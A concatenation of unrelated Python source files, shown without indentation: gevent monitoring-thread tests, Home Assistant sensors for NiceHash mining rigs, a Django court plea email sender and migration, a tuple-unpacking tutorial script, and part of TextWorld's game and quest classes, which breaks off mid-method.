def setUp(self):
super(TestPeriodicMonitoringThread, self).setUp()
self.monitor_thread = gevent.config.monitor_thread
gevent.config.monitor_thread = True
self.monitor_fired = 0
self.monitored_hubs = set()
self._reset_hub()
def tearDown(self):
hub = get_hub()
if not self.monitor_thread and hub.periodic_monitoring_thread:
# If it was true, nothing to do. If it was false, tear things down.
hub.periodic_monitoring_thread.kill()
hub.periodic_monitoring_thread = None
gevent.config.monitor_thread = self.monitor_thread
self.monitored_hubs = None
self._reset_hub()
def _monitor(self, hub):
self.monitor_fired += 1
if self.monitored_hubs is not None:
self.monitored_hubs.add(hub)
def test_config(self):
self.assertEqual(0.1, gevent.config.max_blocking_time)
def _run_monitoring_threads(self, monitor, kill=True):
self.assertTrue(monitor.should_run)
from threading import Condition
cond = Condition()
cond.acquire()
def monitor_cond(_hub):
cond.acquire()
cond.notifyAll()
cond.release()
if kill:
# Only run once. Especially helpful on PyPy, where
# formatting stacks is expensive.
monitor.kill()
monitor.add_monitoring_function(monitor_cond, 0.01)
cond.wait()
cond.release()
monitor.add_monitoring_function(monitor_cond, None)
@greentest.ignores_leakcheck
def test_kill_removes_trace(self):
from greenlet import gettrace
hub = get_hub()
hub.start_periodic_monitoring_thread()
self.assertIsNotNone(gettrace())
hub.periodic_monitoring_thread.kill()
self.assertIsNone(gettrace())
@greentest.ignores_leakcheck
def test_blocking_this_thread(self):
hub = get_hub()
stream = hub.exception_stream = NativeStrIO()
monitor = hub.start_periodic_monitoring_thread()
self.assertIsNotNone(monitor)
self.assertEqual(2, len(monitor.monitoring_functions()))
monitor.add_monitoring_function(self._monitor, 0.1)
self.assertEqual(3, len(monitor.monitoring_functions()))
self.assertEqual(self._monitor, monitor.monitoring_functions()[-1].function)
self.assertEqual(0.1, monitor.monitoring_functions()[-1].period)
# We must make sure we have switched greenlets at least once,
# otherwise we can't detect a failure.
gevent.sleep(0.0001)
assert hub.exception_stream is stream
try:
time.sleep(0.3) # Thrice the default
self._run_monitoring_threads(monitor)
finally:
monitor.add_monitoring_function(self._monitor, None)
self.assertEqual(2, len(monitor._monitoring_functions))
assert hub.exception_stream is stream
monitor.kill()
del hub.exception_stream
self.assertGreaterEqual(self.monitor_fired, 1)
data = stream.getvalue()
self.assertIn('appears to be blocked', data)
self.assertIn('PeriodicMonitoringThread', data)
def _prep_worker_thread(self):
hub = get_hub()
threadpool = hub.threadpool
worker_hub = threadpool.apply(get_hub)
stream = worker_hub.exception_stream = NativeStrIO()
# It does not have a monitoring thread yet
self.assertIsNone(worker_hub.periodic_monitoring_thread)
# So switch to it and give it one.
threadpool.apply(gevent.sleep, (0.01,))
self.assertIsNotNone(worker_hub.periodic_monitoring_thread)
worker_monitor = worker_hub.periodic_monitoring_thread
worker_monitor.add_monitoring_function(self._monitor, 0.1)
return worker_hub, stream, worker_monitor
@greentest.ignores_leakcheck
def test_blocking_threadpool_thread_task_queue(self):
# A threadpool thread spends much of its time
# blocked on the native Lock object. Unless we take
# care, if that thread had created a hub, it will constantly
# be reported as blocked.
worker_hub, stream, worker_monitor = self._prep_worker_thread()
# Now wait until the monitoring threads have run.
self._run_monitoring_threads(worker_monitor)
worker_monitor.kill()
# We did run the monitor in the worker thread, but it
# did NOT report itself blocked by the worker thread sitting there.
self.assertIn(worker_hub, self.monitored_hubs)
self.assertEqual(stream.getvalue(), '')
@greentest.ignores_leakcheck
def test_blocking_threadpool_thread_one_greenlet(self):
# If the background threadpool thread has no other greenlets to run
# and never switches, then even if it has a hub
# we don't report it blocking. The threadpool is *meant* to run
# tasks that block.
hub = get_hub()
threadpool = hub.threadpool
worker_hub, stream, worker_monitor = self._prep_worker_thread()
task = threadpool.spawn(time.sleep, 0.3)
# Now wait until the monitoring threads have run.
self._run_monitoring_threads(worker_monitor)
# and be sure the task ran
task.get()
worker_monitor.kill()
# We did run the monitor in the worker thread, but it
# did NOT report itself blocked by the worker thread
self.assertIn(worker_hub, self.monitored_hubs)
self.assertEqual(stream.getvalue(), '')
@greentest.ignores_leakcheck
def test_blocking_threadpool_thread_multi_greenlet(self):
# If the background threadpool thread ever switches
# greenlets, monitoring goes into affect.
hub = get_hub()
threadpool = hub.threadpool
worker_hub, stream, worker_monitor = self._prep_worker_thread()
def task():
g = gevent.spawn(time.sleep, 0.7)
g.join()
task = threadpool.spawn(task)
# Now wait until the monitoring threads have run.
self._run_monitoring_threads(worker_monitor, kill=False)
# and be sure the task ran
task.get()
worker_monitor.kill()
# We did run the monitor in the worker thread, and it
# DID report itself blocked by the worker thread
self.assertIn(worker_hub, self.monitored_hubs)
data = stream.getvalue()
self.assertIn('appears to be blocked', data)
self.assertIn('PeriodicMonitoringThread', data)
if __name__ == '__main__':
greentest.main()
|
py | b40b28ffe0990fb6f710155cf41dedde71fe6bf1 | """
NiceHash Rig Device Sensors
"""
from datetime import datetime
import logging
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.helpers.entity import Entity
from .const import (
DEVICE_STATUS_UNKNOWN,
DEVICE_LOAD,
DEVICE_RPM,
DEVICE_SPEED_ALGORITHM,
DEVICE_SPEED_RATE,
ICON_PICKAXE,
ICON_PULSE,
ICON_THERMOMETER,
ICON_SPEEDOMETER,
NICEHASH_ATTRIBUTION,
)
from .coordinators import MiningRigsDataUpdateCoordinator
from .nicehash import MiningRig, MiningRigDevice
_LOGGER = logging.getLogger(__name__)
class DeviceSensor(Entity):
"""
Mining rig device sensor
"""
def __init__(
self,
coordinator: MiningRigsDataUpdateCoordinator,
rig: MiningRig,
device: MiningRigDevice,
):
"""Initialize the sensor"""
self.coordinator = coordinator
self._rig_id = rig.id
self._rig_name = rig.name
self._device_id = device.id
self._device_name = device.name
@property
def name(self):
"""Sensor name"""
return f"{self._device_name}"
@property
def should_poll(self):
"""No need to poll, Coordinator notifies entity of updates"""
return False
@property
def available(self):
"""Whether sensor is available"""
return self.coordinator.last_update_success
@property
def icon(self):
"""Sensor icon"""
return ICON_PICKAXE
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return None
async def async_added_to_hass(self):
"""Connect to dispatcher listening for entity data notifications"""
self.async_on_remove(
self.coordinator.async_add_listener(self.async_write_ha_state)
)
async def async_update(self):
"""Update entity"""
await self.coordinator.async_request_refresh()
def _get_device(self):
try:
mining_rigs = self.coordinator.data.get("miningRigs")
rig = MiningRig(mining_rigs.get(self._rig_id))
return rig.devices.get(self._device_id)
except Exception as e:
_LOGGER.error(f"Unable to get mining device ({self._device_id})\n{e}")
class DeviceStatusSensor(DeviceSensor):
"""
Displays status of a mining rig device
"""
_status = "Unknown"
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Status"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:status"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._status = device.status
else:
self._status = "Unknown"
return self._status
@property
def icon(self):
"""Sensor icon"""
return ICON_PULSE
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"status": self._status,
"rig": self._rig_name,
}
class DeviceSpeedSensor(DeviceSensor):
"""
Displays speed of a mining rig device
"""
_algorithm = None
_speed = 0.00
_speed_unit = "MH"
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Speed"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:speed"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device and len(device.speeds) > 0:
algorithm = device.speeds[0]
self._algorithm = algorithm.get("title")
self._speed = algorithm.get("speed")
self._speed_unit = algorithm.get("displaySuffix")
else:
self._algorithm = "Unknown"
self._speed = 0.00
self._speed_unit = "MH"
return self._speed
@property
def icon(self):
"""Sensor icon"""
return ICON_SPEEDOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return f"{self._speed_unit}/s"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"algorithm": self._algorithm,
"speed": self._speed,
"speed_unit": self._speed_unit,
"rig": self._rig_name,
}
class DeviceAlgorithmSensor(DeviceSensor):
"""
Displays algorithm of a mining rig device
"""
_algorithm = None
_speed = 0.00
_speed_unit = "MH"
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Algorithm"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:algorithm"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device and len(device.speeds) > 0:
algorithm = device.speeds[0]
self._algorithm = algorithm.get("title")
self._speed = algorithm.get("speed")
self._speed_unit = algorithm.get("displaySuffix")
else:
self._algorithm = "Unknown"
self._speed = 0.00
self._speed_unit = "MH"
return self._algorithm
@property
def icon(self):
"""Sensor icon"""
return ICON_PICKAXE
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"algorithm": self._algorithm,
"speed": self._speed,
"speed_unit": self._speed_unit,
"rig": self._rig_name,
}
class DeviceTemperatureSensor(DeviceSensor):
"""
Displays temperature of a mining rig device
"""
_temperature = 0
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Temperature"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:temperature"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._temperature = device.temperature
else:
self._temperature = 0
return self._temperature
@property
def icon(self):
"""Sensor icon"""
return ICON_THERMOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
# Not Celsius because then HA might convert to Fahrenheit
return "C"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"temperature": self._temperature,
"rig": self._rig_name,
}
class DeviceLoadSensor(DeviceSensor):
"""
Displays load of a mining rig device
"""
_load = 0
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Load"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:load"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._load = device.load
else:
self._load = 0
return self._load
@property
def icon(self):
"""Sensor icon"""
return ICON_SPEEDOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return "%"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"load": self._load,
"rig": self._rig_name,
}
class DeviceRPMSensor(DeviceSensor):
"""
Displays RPM of a mining rig device
"""
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} RPM"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:rpm"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._rpm = device.rpm
else:
self._rpm = 0
return self._rpm
@property
def icon(self):
"""Sensor icon"""
return ICON_SPEEDOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return "RPM"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"rpm": self._rpm,
"rig": self._rig_name,
}
|
py | b40b294739fccce10e20445315eb97988e6b040a | import datetime as dt
from dateutil import parser
import logging
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.text import wrap
from django.utils import translation
from django.utils.translation import ugettext as _
from .models import Case, CourtEmailCount, Court
from .encrypt import encrypt_and_store_user_data
from .tasks import email_send_court, email_send_prosecutor, email_send_user
from .standardisers import format_for_region, standardise_name
logger = logging.getLogger(__name__)
def get_plea_type(context_data):
"""
Determine if pleas for a submission are
all guilty - returns "guilty"
all not guilty - returns "not_guilty"
or mixed - returns "mixed"
"""
guilty_count = len([plea for plea in context_data["plea"]["data"]
if plea["guilty"] == "guilty_court" or plea["guilty"] == "guilty_no_court"])
if guilty_count == 0:
return "not_guilty"
elif guilty_count == len(context_data["plea"]["data"]):
return "guilty"
else:
return "mixed"
def send_plea_email(context_data):
"""
Sends a plea email. All addresses, content etc. are defined in
settings.
context_data: dict populated by form fields
"""
case = Case.objects.filter(
urn__iexact=context_data["case"]["urn"].upper(), sent=False,
imported=True).first()
if not case:
case = Case.objects.create(urn=context_data["case"]["urn"].upper(),
sent=False,
imported=False)
court_obj = Court.objects.get_court(context_data["case"]["urn"], ou_code=case.ou_code)
email_address = context_data.get("your_details", {}).get("email", False)
email_address = email_address or context_data.get("company_details", {}).get("email", False)
context_data["email"] = email_address
# add DOH / name to the email subject for compliance with the current format
if not context_data["notice_type"]["sjp"]:
if isinstance(context_data["case"]["date_of_hearing"], str):
date_of_hearing = parser.parse(context_data["case"]["date_of_hearing"])
else:
date_of_hearing = context_data["case"]["date_of_hearing"]
context_data["email_date_of_hearing"] = date_of_hearing.strftime("%Y-%m-%d")
if context_data["case"]["plea_made_by"] == "Defendant":
first_name = context_data["your_details"]["first_name"]
middle_name = context_data["your_details"]["middle_name"]
last_name = context_data["your_details"]["last_name"]
else:
first_name = context_data["company_details"]["first_name"]
middle_name = ""
last_name = context_data["company_details"]["last_name"]
if "date_of_birth" in context_data["case"]:
context_data["your_details"]["date_of_birth"] = context_data["case"]["date_of_birth"]
context_data["email_name"] = " ".join([last_name.upper(), first_name, middle_name]).strip()
# Add Welsh flag if journey was completed in Welsh
if translation.get_language() == "cy":
context_data["welsh_language"] = True
if context_data["notice_type"]["sjp"]:
case.initiation_type = "J"
case.language = translation.get_language().split("-")[0]
case.name = standardise_name(first_name, last_name)
case.completed_on = dt.datetime.now()
if context_data["case"]["plea_made_by"] == "Company representative":
if case.extra_data and "OrganisationName" in case.extra_data:
case.extra_data["OrganisationName"] = context_data.get("company_details", {}).get("company_name")
else:
case.extra_data = {"OrganisationName": context_data.get("company_details", {}).get("company_name")}
if email_address:
case.email = email_address
case.send_user_email = True
case.save()
if getattr(settings, "STORE_USER_DATA", False):
encrypt_and_store_user_data(case.urn, case.id, context_data)
if not court_obj.test_mode:
# don't add test court entries to the anon stat data
email_count = CourtEmailCount()
email_count.get_from_context(context_data, court=court_obj)
email_count.save()
email_count_id = email_count.id
else:
# use a fake email count ID as we're using a test record
email_count_id = "XX"
email_send_court.delay(case.id, email_count_id, context_data)
if court_obj.plp_email:
email_send_prosecutor.delay(case.id, context_data)
if email_address:
data = {
"urn": format_for_region(context_data["case"]["urn"]),
"plea_made_by": context_data["case"]["plea_made_by"],
"number_of_charges": context_data["case"]["number_of_charges"],
"contact_deadline": context_data["case"]["contact_deadline"],
"plea_type": get_plea_type(context_data),
"court_name": court_obj.court_name,
"court_email": court_obj.court_email
}
email_template = "emails/user_plea_confirmation"
try:
if context_data["notice_type"]["sjp"]:
email_template = "emails/user_plea_confirmation_sjp"
except KeyError:
pass
html_body = render_to_string(email_template + ".html", data)
txt_body = wrap(render_to_string(email_template + ".txt", data), 72)
subject = _("Online plea submission confirmation")
email_send_user.delay(case.id, email_address, subject, html_body, txt_body)
else:
case.add_action("No email entered, user email not sent", "")
return True
|
py | b40b2adc03a369aa2898d55a39ba7d8f1274b3f4 | # Generated by Django 2.1.15 on 2021-03-10 11:29
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b40b2b8f2c3f98ff8ca0020b00d30d5dca99168f | from collections import namedtuple
import os
lax_coordinates = (33.9425, -118.408056)
city, year, pop, chg, area = ('Tokyo', 2003, 32450, 0.66, 8014)
traveler_ids = [('USA', '31195855'), ('BRA', 'CE342567'),
('ESP', 'XDA205856')]
for passport in sorted(traveler_ids):
print('%s / %s' % passport)
# The for loop knows how to retrieve the items of a tuple separately—this is called
# “unpacking.” Here we are not interested in the second item, so it’s assigned to
# _, a dummy variable.
for city, _ in sorted(traveler_ids):
print(city)
# Extended Iterable Unpacking
a, *b, c = range(5)
print(a, b, c)
print(*range(10))
# swapping
b, a = a, b
a, b = divmod(20, 5)
print(a, b)
t = (20, 8)
divmod(*t)
quotient, remainder = divmod(*t)
print(quotient, remainder)
print(os.getcwd())
_, filename = os.path.split(os.getcwd())
print(filename)
City = namedtuple('City', 'name country population coordinates')
tokyo = City('Tokyo', 'JP', 36.933, (35.689722, 139.691667))
print(tokyo)
def testfunc(x: int):
print(x)
testfunc(10)
print(City._fields)
print(tokyo._asdict())
for ke, vl in tokyo._asdict().items():
print(ke, vl)
print(tokyo.count(tokyo))
name = "Sudeep Mahesh chandra patel"
firstname = slice(0, 6)
print(name[firstname])
|
py | b40b2bdeb41ef8b8308691a9dc759efb39b6f374 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
import copy
import json
import textwrap
from typing import List, Dict, Optional, Mapping, Any, Iterable, Union, Tuple
from collections import OrderedDict
from numpy.random import RandomState
from textworld import g_rng
from textworld.utils import encode_seeds
from textworld.generator.data import KnowledgeBase
from textworld.generator.text_grammar import Grammar, GrammarOptions
from textworld.generator.world import World
from textworld.logic import Action, Proposition, State
from textworld.generator.graph_networks import DIRECTIONS
from textworld.generator.chaining import ChainingOptions
from textworld.generator.dependency_tree import DependencyTree
from textworld.generator.dependency_tree import DependencyTreeElement
try:
from typing import Collection
except ImportError:
# Collection is new in Python 3.6 -- fall back on Iterable for 3.5
from typing import Iterable as Collection
class UnderspecifiedEventError(NameError):
def __init__(self):
msg = "Either the actions or the conditions is needed to create an event."
super().__init__(msg)
class UnderspecifiedQuestError(NameError):
def __init__(self):
msg = "At least one winning or failing event is needed to create a quest."
super().__init__(msg)
def gen_commands_from_actions(actions: Iterable[Action], kb: Optional[KnowledgeBase] = None) -> List[str]:
kb = kb or KnowledgeBase.default()
def _get_name_mapping(action):
mapping = kb.rules[action.name].match(action)
return {ph.name: var.name for ph, var in mapping.items()}
commands = []
for action in actions:
command = "None"
if action is not None:
command = kb.inform7_commands[action.name]
command = command.format(**_get_name_mapping(action))
commands.append(command)
return commands
class Event:
"""
Event happening in TextWorld.
An event gets triggered when its set of conditions become all statisfied.
Attributes:
actions: Actions to be performed to trigger this event
commands: Human readable version of the actions.
condition: :py:class:`textworld.logic.Action` that can only be applied
when all conditions are statisfied.
"""
def __init__(self, actions: Iterable[Action] = (),
conditions: Iterable[Proposition] = (),
commands: Iterable[str] = ()) -> None:
"""
Args:
actions: The actions to be performed to trigger this event.
If an empty list, then `conditions` must be provided.
conditions: Set of propositions which need to
be all true in order for this event
to get triggered.
commands: Human readable version of the actions.
"""
self.actions = actions
self.commands = commands
self.condition = self.set_conditions(conditions)
@property
def actions(self) -> Iterable[Action]:
return self._actions
@actions.setter
def actions(self, actions: Iterable[Action]) -> None:
self._actions = tuple(actions)
@property
def commands(self) -> Iterable[str]:
return self._commands
@commands.setter
def commands(self, commands: Iterable[str]) -> None:
self._commands = tuple(commands)
def is_triggering(self, state: State) -> bool:
""" Check if this event would be triggered in a given state. """
return state.is_applicable(self.condition)
def set_conditions(self, conditions: Iterable[Proposition]) -> Action:
"""
Set the triggering conditions for this event.
Args:
conditions: Set of propositions which need to
be all true in order for this event
to get triggered.
Returns:
Action that can only be applied when all conditions are statisfied.
"""
if not conditions:
if len(self.actions) == 0:
raise UnderspecifiedEventError()
# The default winning conditions are the postconditions of the
# last action in the quest.
conditions = self.actions[-1].postconditions
variables = sorted(set([v for c in conditions for v in c.arguments]))
event = Proposition("event", arguments=variables)
self.condition = Action("trigger", preconditions=conditions,
postconditions=list(conditions) + [event])
return self.condition
def __hash__(self) -> int:
return hash((self.actions, self.commands, self.condition))
def __eq__(self, other: Any) -> bool:
return (isinstance(other, Event)
and self.actions == other.actions
and self.commands == other.commands
and self.condition == other.condition)
@classmethod
def deserialize(cls, data: Mapping) -> "Event":
""" Creates an `Event` from serialized data.
Args:
data: Serialized data with the needed information to build a
`Event` object.
"""
actions = [Action.deserialize(d) for d in data["actions"]]
condition = Action.deserialize(data["condition"])
event = cls(actions, condition.preconditions, data["commands"])
return event
def serialize(self) -> Mapping:
""" Serialize this event.
Results:
`Event`'s data serialized to be JSON compatible.
"""
data = {}
data["commands"] = self.commands
data["actions"] = [action.serialize() for action in self.actions]
data["condition"] = self.condition.serialize()
return data
def copy(self) -> "Event":
""" Copy this event. """
return self.deserialize(self.serialize())
class Quest:
""" Quest representation in TextWorld.
A quest is defined by a mutually exclusive set of winning events and
a mutually exclusive set of failing events.
Attributes:
win_events: Mutually exclusive set of winning events. That is,
only one such event needs to be triggered in order
to complete this quest.
fail_events: Mutually exclusive set of failing events. That is,
only one such event needs to be triggered in order
to fail this quest.
reward: Reward given for completing this quest.
desc: A text description of the quest.
commands: List of text commands leading to this quest completion.
"""
def __init__(self,
win_events: Iterable[Event] = (),
fail_events: Iterable[Event] = (),
reward: Optional[int] = None,
desc: Optional[str] = None,
commands: Iterable[str] = ()) -> None:
r"""
Args:
win_events: Mutually exclusive set of winning events. That is,
only one such event needs to be triggered in order
to complete this quest.
fail_events: Mutually exclusive set of failing events. That is,
only one such event needs to be triggered in order
to fail this quest.
reward: Reward given for completing this quest. By default,
reward is set to 1 if there is at least one winning events
otherwise it is set to 0.
desc: A text description of the quest.
commands: List of text commands leading to this quest completion.
"""
self.win_events = tuple(win_events)
self.fail_events = tuple(fail_events)
self.desc = desc
self.commands = tuple(commands)
# Unless explicitly provided, reward is set to 1 if there is at least
# one winning events otherwise it is set to 0.
self.reward = int(len(win_events) > 0) if reward is None else reward
if len(self.win_events) == 0 and len(self.fail_events) == 0:
raise UnderspecifiedQuestError()
@property
def win_events(self) -> Iterable[Event]:
return self._win_events
@win_events.setter
def win_events(self, events: Iterable[Event]) -> None:
self._win_events = tuple(events)
@property
def fail_events(self) -> Iterable[Event]:
return self._fail_events
@fail_events.setter
def fail_events(self, events: Iterable[Event]) -> None:
self._fail_events = tuple(events)
@property
def commands(self) -> Iterable[str]:
return self._commands
@commands.setter
def commands(self, commands: Iterable[str]) -> None:
self._commands = tuple(commands)
def is_winning(self, state: State) -> bool:
""" Check if this quest is winning in that particular state. """
return any(event.is_triggering(state) for event in self.win_events)
def is_failing(self, state: State) -> bool:
""" Check if this quest is failing in that particular state. """
return any(event.is_triggering(state) for event in self.fail_events)
def __hash__(self) -> int:
return hash((self.win_events, self.fail_events, self.reward,
self.desc, self.commands))
def __eq__(self, other: Any) -> bool:
return (isinstance(other, Quest)
and self.win_events == other.win_events
and self.fail_events == other.fail_events
and self.reward == other.reward
and self.desc == other.desc
and self.commands == other.commands)
@classmethod
def deserialize(cls, data: Mapping) -> "Quest":
""" Creates a `Quest` from serialized data.
Args:
data: Serialized data with the needed information to build a
`Quest` object.
"""
win_events = [Event.deserialize(d) for d in data["win_events"]]
fail_events = [Event.deserialize(d) for d in data["fail_events"]]
commands = data.get("commands", [])
reward = data["reward"]
desc = data["desc"]
return cls(win_events, fail_events, reward, desc, commands)
def serialize(self) -> Mapping:
""" Serialize this quest.
Results:
Quest's data serialized to be JSON compatible
"""
data = {}
data["desc"] = self.desc
data["reward"] = self.reward
data["commands"] = self.commands
data["win_events"] = [event.serialize() for event in self.win_events]
data["fail_events"] = [event.serialize() for event in self.fail_events]
return data
def copy(self) -> "Quest":
""" Copy this quest. """
return self.deserialize(self.serialize())
class EntityInfo:
""" Additional information about entities in the game. """
__slots__ = ['id', 'type', 'name', 'noun', 'adj', 'desc', 'room_type', 'definite', 'indefinite', 'synonyms']
def __init__(self, id: str, type: str) -> None:
#: str: Unique name for this entity. It is used when generating
self.id = id
#: str: The type of this entity.
self.type = type
#: str: The name that will be displayed in-game to identify this entity.
self.name = None
#: str: The noun part of the name, if available.
self.noun = None
#: str: The adjective (i.e. descriptive) part of the name, if available.
self.adj = None
#: str: The definite article to use for this entity.
self.definite = None
#: str: The indefinite article to use for this entity.
self.indefinite = None
#: List[str]: Alternative names that can be used to refer to this entity.
self.synonyms = None
#: str: Text description displayed when examining this entity in the game.
self.desc = None
#: str: Type of the room this entity belongs to. It used to influence
#: its `name` during text generation.
self.room_type = None
def __eq__(self, other: Any) -> bool:
return (isinstance(other, EntityInfo)
and all(getattr(self, slot) == getattr(other, slot)
for slot in self.__slots__))
def __hash__(self) -> int:
return hash(tuple(getattr(self, slot) for slot in self.__slots__))
def __str__(self) -> str:
return "Info({}: {} | {})".format(self.name, self.adj, self.noun)
@classmethod
def deserialize(cls, data: Mapping) -> "EntityInfo":
""" Creates a `EntityInfo` from serialized data.
Args:
data: Serialized data with the needed information to build a
`EntityInfo` object.
"""
info = cls(data["id"], data["type"])
for slot in cls.__slots__:
setattr(info, slot, data.get(slot))
return info
def serialize(self) -> Mapping:
""" Serialize this object.
Results:
EntityInfo's data serialized to be JSON compatible
"""
return {slot: getattr(self, slot) for slot in self.__slots__}
class Game:
""" Game representation in TextWorld.
A `Game` is defined by a world and it can have quest(s) or not.
Additionally, a grammar can be provided to control the text generation.
"""
_SERIAL_VERSION = 1
def __init__(self, world: World, grammar: Optional[Grammar] = None,
quests: Iterable[Quest] = ()) -> None:
"""
Args:
world: The world to use for the game.
quests: The quests to be done in the game.
grammar: The grammar to control the text generation.
"""
self.world = world
self.quests = tuple(quests)
self.metadata = {}
self._objective = None
self._infos = self._build_infos()
self.kb = world.kb
self.change_grammar(grammar)
@property
def infos(self) -> Dict[str, EntityInfo]:
""" Information about the entities in the game. """
return self._infos
def _build_infos(self) -> Dict[str, EntityInfo]:
mapping = OrderedDict()
for entity in self.world.entities:
if entity not in mapping:
mapping[entity.id] = EntityInfo(entity.id, entity.type)
return mapping
def copy(self) -> "Game":
""" Make a shallow copy of this game. """
game = Game(self.world, None, self.quests)
game._infos = dict(self.infos)
game._objective = self._objective
game.metadata = dict(self.metadata)
return game
def change_grammar(self, grammar: Grammar) -> None:
""" Changes the grammar used and regenerate all text. """
self.grammar = grammar
_gen_commands = gen_commands_from_actions
if self.grammar:
from textworld.generator.inform7 import Inform7Game
from textworld.generator.text_generation import generate_text_from_grammar
inform7 = Inform7Game(self)
_gen_commands = inform7.gen_commands_from_actions
generate_text_from_grammar(self, self.grammar)
for quest in self.quests:
for event in quest.win_events:
event.commands = _gen_commands(event.actions)
if quest.win_events:
quest.commands = quest.win_events[0].commands
# Check if we can derive a global winning policy from the quests.
if self.grammar:
from textworld.generator.text_generation import describe_event
policy = GameProgression(self).winning_policy
if policy:
mapping = {k: info.name for k, info in self._infos.items()}
commands = [a.format_command(mapping) for a in policy]
self.metadata["walkthrough"] = commands
self.objective = describe_event(Event(policy), self, self.grammar)
def save(self, filename: str) -> None:
""" Saves the serialized data of this game to a file. """
with open(filename, 'w') as f:
json.dump(self.serialize(), f)
@classmethod
def load(cls, filename: str) -> "Game":
""" Creates `Game` from serialized data saved in a file. """
with open(filename, 'r') as f:
return cls.deserialize(json.load(f))
@classmethod
def deserialize(cls, data: Mapping) -> "Game":
""" Creates a `Game` from serialized data.
Args:
data: Serialized data with the needed information to build a
`Game` object.
"""
version = data.get("version", cls._SERIAL_VERSION)
if version != cls._SERIAL_VERSION:
msg = "Cannot deserialize a TextWorld version {} game, expected version {}"
raise ValueError(msg.format(version, cls._SERIAL_VERSION))
kb = KnowledgeBase.deserialize(data["KB"])
world = World.deserialize(data["world"], kb=kb)
game = cls(world)
game.grammar_options = GrammarOptions(data["grammar"])
game.quests = tuple([Quest.deserialize(d) for d in data["quests"]])
game._infos = {k: EntityInfo.deserialize(v) for k, v in data["infos"]}
game.metadata = data.get("metadata", {})
game._objective = data.get("objective", None)
return game
def serialize(self) -> Mapping:
""" Serialize this object.
Results:
Game's data serialized to be JSON compatible
"""
data = {}
data["version"] = self._SERIAL_VERSION
data["world"] = self.world.serialize()
data["grammar"] = self.grammar.options.serialize() if self.grammar else {}
data["quests"] = [quest.serialize() for quest in self.quests]
data["infos"] = [(k, v.serialize()) for k, v in self._infos.items()]
data["KB"] = self.kb.serialize()
data["metadata"] = self.metadata
data["objective"] = self._objective
return data
def __eq__(self, other: Any) -> bool:
return (isinstance(other, Game)
and self.world == other.world
and self.infos == other.infos
and self.quests == other.quests
and self.metadata == other.metadata
and self._objective == other._objective)
def __hash__(self) -> int:
state = (self.world,
frozenset(self.quests),
frozenset(self.infos.items()),
self._objective)
return hash(state)
@property
def max_score(self) -> int:
""" Sum of the reward of all quests. """
return sum(quest.reward for quest in self.quests)
@property
def command_templates(self) -> List[str]:
""" All command templates understood in this game. """
return sorted(set(cmd for cmd in self.kb.inform7_commands.values()))
@property
def directions_names(self) -> List[str]:
return DIRECTIONS
@property
def objects_types(self) -> List[str]:
""" All types of objects in this game. """
return sorted(self.kb.types.types)
@property
def objects_names(self) -> List[str]:
""" The names of all relevant objects in this game. """
def _filter_unnamed_and_room_entities(e):
return e.name and e.type != "r"
entities_infos = filter(_filter_unnamed_and_room_entities, self.infos.values())
return [info.name for info in entities_infos]
@property
def entity_names(self) -> List[str]:
return self.objects_names + self.directions_names
@property
def objects_names_and_types(self) -> List[str]:
""" The names of all non-player objects along with their type in this game. """
def _filter_unnamed_and_room_entities(e):
return e.name and e.type != "r"
entities_infos = filter(_filter_unnamed_and_room_entities, self.infos.values())
return [(info.name, info.type) for info in entities_infos]
@property
def verbs(self) -> List[str]:
""" Verbs that should be recognized in this game. """
# Retrieve commands templates for every rule.
return sorted(set(cmd.split()[0] for cmd in self.command_templates))
@property
def win_condition(self) -> List[Collection[Proposition]]:
""" All win conditions, one for each quest. """
return [q.winning_conditions for q in self.quests]
@property
def objective(self) -> str:
if self._objective is not None:
return self._objective
# TODO: Find a better way of describing the objective of the game with several quests.
self._objective = "\nAND\n".join(quest.desc for quest in self.quests if quest.desc)
return self._objective
@objective.setter
def objective(self, value: str):
